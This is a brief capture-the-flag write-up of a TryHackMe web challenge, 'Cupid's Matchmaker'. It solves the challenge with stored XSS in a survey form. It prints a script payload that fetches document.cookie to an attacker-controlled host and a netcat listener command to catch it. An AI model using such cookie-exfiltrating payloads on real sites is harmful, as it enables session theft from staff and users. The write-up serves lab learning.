Andrew Kapaldo

Andrew Kapaldo

Security researcher & CTF enthusiast

Cupids Matchmaker

less than 1 minute read

🌐 Love at First Breach 2026 - Cupid’s Matchmaker

Category Author
🌐 Web TryHackMe

Challenge Prompt

My Dearest Hacker,

Tired of soulless AI algorithms? At Cupid’s Matchmaker, real humans read your personality survey and personally match you with compatible singles. Our dedicated matchmaking team reviews every submission to ensure you find true love this Valentine’s Day! 💘No algorithms. No AI. Just genuine human connection

You can access the web app here: http://MACHINE_IP:5000

Problem Type

  • Web
  • XSS

Solve

Upon visiting the page we see Cupid’s Matchmaker. The page suggests we start with doing the survey: image

If we visit the survey, we can put anything we want into the textarea boxes, so how about some XSS? :)
I used:

1

<script>fetch(http://MY_IP:7777/?c='+document.cookie)</script>

image

Before submitting the form start a netcat listnener on your machine with nc -nvlp 7777
image

Submit the form and you should get the flag: image

Tags: ,

Categories:

Updated:

You May Also Enjoy

ValenFind

2 minute read

🌐 Love at First Breach 2026 - Valenfind

Try Heart Me

1 minute read

🌐 Love at First Breach 2026 - TryHeartMe

Speed Chat

1 minute read

🌐 Love at First Breach 2026 - Speed Chat